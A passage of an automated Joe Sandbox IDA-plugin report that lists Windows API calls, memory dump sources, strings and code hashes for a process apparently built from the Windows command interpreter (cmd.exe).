                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E04
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750589
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF79375059E
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505AF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF7937505C5
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505EF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF793750605
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750632
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF793750647
                                                                                        • Part of subcall function 00007FF793754A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                        • Part of subcall function 00007FF793754A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                        • Part of subcall function 00007FF793754A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                        • Part of subcall function 00007FF793754A14: memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                        • Part of subcall function 00007FF793754A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                        • Part of subcall function 00007FF793754AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AD6
                                                                                        • Part of subcall function 00007FF793754AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AEF
                                                                                        • Part of subcall function 00007FF793755554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF793754E35), ref: 00007FF7937555DA
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755623
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755667
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF7937556BE
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755702
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E35
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E81
                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F69
                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F95
                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FB0
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FC1
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FD8
                                                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FF8
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755037
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375504B
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550DF
                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550F2
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375510F
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755130
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375514A
                                                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755175
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                      • API String ID: 1049357271-3021193919
                                                                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction ID: c112c52ef1ec8d21919dcb0b537597efa9e3325dcbee75d4cbb59cbde2239fc3
                                                                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction Fuzzy Hash: 33C17421A08A4296FAA4BB31A8D01B9F7A9FF4DB91F854135D90F277A1DF3CA5058370

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                      • String ID: :
                                                                                      • API String ID: 1809961153-336475711
                                                                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction ID: a379a60f1049dde1cd64dc169d5e85af75d6a4255325b09d43e1e1edf2e1aead
                                                                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction Fuzzy Hash: 17D1402270DB8592EAB4EF25E4842BAF7A5FB88740F844136D94E537A4DF3CE545C720

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                      • API String ID: 2622545777-4197029667
                                                                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction ID: 272626189376325584adc33a3d91f497d77b2207a10d3037007bcf846100987b
                                                                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction Fuzzy Hash: 38915D61B09A8685EEB8AB30D8905F9A3A8FF4CB85FC44136C90E67795DF3CE504C360

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                      • String ID: CMD.EXE
                                                                                      • API String ID: 1606018815-3025314500
                                                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction ID: 9249309a18d82c0b90a6bb40c08126453e5d43e8fc4e50ee32c00e719d7b95d6
                                                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction Fuzzy Hash: CF41D331A096428BF7A86B34E8D51B8B7A8FB8E752FC84179C50F533A0DF3CA5058661

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleTitlewcschr
                                                                                      • String ID: /$:
                                                                                      • API String ID: 2364928044-4222935259
                                                                                      • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction ID: 7a50722306868e47fb996f3c8b1dd0867a478090d794f9a3903296cce8a45828
                                                                                      • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction Fuzzy Hash: 4AC19065A08643A2FAB4BB35D4C8379E2AAEF48B90FC44135D91E672D5DF3CE840D720

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                      • String ID:
                                                                                      • API String ID: 4291973834-0
                                                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction ID: a6e33362265b251b22fd1a744eba515df69cefe95028110cbd91f614d4653b99
                                                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction Fuzzy Hash: C941D921A1864392F6F4BB30E8C0275A2A9AF4C746F940436D91EB77A0DF7DED408761

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 850181435-0
                                                                                      • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                      • Instruction ID: 520bc9c30a68df39165a2460b21cb826533a49a27cca6ea12673be0cf855ca64
                                                                                      • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                      • Instruction Fuzzy Hash: 63417F32608BC5C9E7B09F30D8842E9B7A9FB8DB85F944525DA4E5BB48CF38D645C710

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                      • memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                      Similarity
                                                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                      • String ID:
                                                                                      • API String ID: 1623332820-0
                                                                                      • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                      • Instruction ID: 95d4df94d86eb06f24399620539ece9ad3a42f0006c058c1ffe19f7d162591e8
                                                                                      • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                      • Instruction Fuzzy Hash: 6511A722A1874182EEA4AF65B484079FBA4FB8DF81F899039DE4F13744DF3DE4418760
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1826527819-0
                                                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                      • Instruction ID: cf991dfe946150cf86dd423122d1c9b225a329de7101ba998f328d310628cede
                                                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                      • Instruction Fuzzy Hash: 63016131908682CAE6A47B35A4941B8FA69FF8E756FC45134D54F163A1DF3C9048CB60
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7937492AC), ref: 00007FF7937530CA
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF7937530DD
                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7937530F6
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF793753106
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1464828906-0
                                                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                      • Instruction ID: 5b11e0cabb63fba5ec371f99ba4730bd387160f705bac049b412ec98dba40d75
                                                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                      • Instruction Fuzzy Hash: 41310721A0861582F6B9AF36A48017EF665EB4DB90FD48236DA4E573E0DF7DE8458320
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                      • API String ID: 2221118986-3416068913
                                                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                      • Instruction ID: 1dd00eea0e31be46af8d4a2878d19f1a081495407168b3b8dfa40ac4ea44f51f
                                                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                      • Instruction Fuzzy Hash: 6D110625B0864381FFF4EB31A1C42B992999F8CBA4F984235DE2D6B3D5DE2CE0408360
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memsetwcschr
                                                                                      • String ID: 2$COMSPEC
                                                                                      • API String ID: 1764819092-1738800741
                                                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                      • Instruction ID: 401d013b1083e3836b6698e574be70b93731c1fb4dd8b1b5887cb2deaa50f255
                                                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                      • Instruction Fuzzy Hash: AC517021A0865385FBF8BB3594C9379A2DE9F8D784FC44031DA8D662D6DE2CFC448761
                                                                                      APIs
                                                                                       Memory Dump Source
                                                                                       • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                       • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 4254246844-0
                                                                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                      • Instruction ID: c039c71613fb496dcb0a695a45d460ec9e5853126bc18bb05143b98c1dedb4cb
                                                                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                      • Instruction Fuzzy Hash: AA41D622A0874686FEB9AB20E4C4379E7A8EF8D790FC44432D94E577D0DF3CE4418620
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                      • String ID:
                                                                                      • API String ID: 2643372051-0
                                                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                      • Instruction ID: aed86b566aed323ecd274d5598a41411d1de61c39f514bb8f8e72ccd8f9b9593
                                                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                      • Instruction Fuzzy Hash: 38F0D662A1DB8285EBA4AB35F4C4075EAE5FF4D7A1B869234C52F13390DF3C94448260
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleMode
                                                                                      • String ID:
                                                                                      • API String ID: 1591002910-0
                                                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                      • Instruction ID: 6e0270f3415e1c20a7153add33fbe9e3d80da1c09cc44a434a9427a2150cf3f5
                                                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                      • Instruction Fuzzy Hash: 22F07A34A09642CBE6A8AB30E8C5078BBE4FB8D712F844174C90F63360DF3CA5058B61
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: :
                                                                                      • API String ID: 338552980-336475711
                                                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                      • Instruction ID: 93237230a9f991ab61e453467b9c04a3d2c66d58becc0472cfe4ca180cf1aada
                                                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                      • Instruction Fuzzy Hash: 6DE09267618640C7E770AF60E4910AAF7A0FB8D349FC41525EA8E93764DB3CD249CF18
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF793755B52
                                                                                        • Part of subcall function 00007FF793754224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754297
                                                                                        • Part of subcall function 00007FF793754224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937542D7
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF7937542FD
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF793754368
                                                                                        • Part of subcall function 00007FF793754224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754380
                                                                                        • Part of subcall function 00007FF793754224: wcsrchr.MSVCRT ref: 00007FF7937543E6
                                                                                        • Part of subcall function 00007FF793754224: lstrcmpW.KERNELBASE ref: 00007FF793754401
                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF793755BC7
                                                                                      Similarity
                                                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 497088868-0
                                                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                      • Instruction ID: eaf17062f21016f1e6bc0f9c8175ced092006246eae238aef43b3df1c3c64531
                                                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                      • Instruction Fuzzy Hash: A6318420B0C64282FAB8B731A4D457DF299EF8DB90F845436E94EA7B95DE3CE5058720
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(?,?,?,00007FF79376EAC5,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793753A56
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                      • Instruction ID: 3227d2b43baa87fe78afaa39f81c997b59a30b4b9f05832c0b6d7c728b955b35
                                                                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                      • Instruction Fuzzy Hash: 59019620E0868395F6F8A775A5C0275E6A8EF5CB90BD09432E50EA2664DE2CE5918770
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1412018758-0
                                                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                      • Instruction ID: f59dcc5536fd22f389055c3163191533b997f1c1db1b86519b9fe18bbef171c4
                                                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                      • Instruction Fuzzy Hash: 59E0ED41F5A70B91FEBD3B7268C117492595F6E741E9C2431DD1E25382EE2CE195C331
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
